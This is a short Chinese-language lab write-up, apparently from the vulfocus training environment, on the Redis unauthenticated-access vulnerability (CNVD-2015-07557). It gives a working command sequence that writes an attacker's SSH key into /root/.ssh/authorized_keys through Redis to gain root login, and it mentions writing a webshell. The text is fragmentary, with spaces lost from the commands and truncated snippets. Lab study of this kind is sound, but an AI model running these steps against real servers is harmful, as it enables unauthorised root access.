vulfocus redis 未授权访问 (CNVD-2015-07557) 一、简介 1.Redis是一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库,并提供多种语言的API。 2.Redis默认端口:6379,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。
cd/root/.ssh/(echo-e"\n\n"; cat id_rsa.pub;echo-e"\n\n") > key.txtcat key.txt | redis-cli -h 目标IP -xsetxxx//以上步骤在自己的攻击机器上执行configsetdir /root/.ssh/configsetdbfilename authorized_keyssavecd/root/.ssh/ssh -i id_rsa root@目标IP 详细利用步骤可参考Redis未授权...
对于Redis服务的未授权访问,首先需要确认Redis未授权是否存在,使用Redis数据库客户端进行连接测试,如何没有密码,即未授权漏洞存在。 客户端连接工具Another Redis Desktop Manager 具体表现如下 漏洞利用 漏洞利用有三种利用方式,每种方式都有限制条件,本质就是使用Redis数据库操作语句在目标主机进行写入文件。 写入Webshell ...